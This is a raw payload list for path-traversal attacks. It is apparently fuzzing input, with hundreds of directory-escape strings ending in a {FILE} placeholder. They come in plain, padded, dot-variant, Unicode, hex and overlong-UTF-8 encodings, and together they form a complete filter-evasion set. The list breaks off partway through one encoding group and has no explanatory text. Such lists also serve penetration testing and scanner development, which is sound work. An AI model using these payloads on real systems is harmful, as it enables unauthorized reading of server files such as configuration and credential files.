AAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
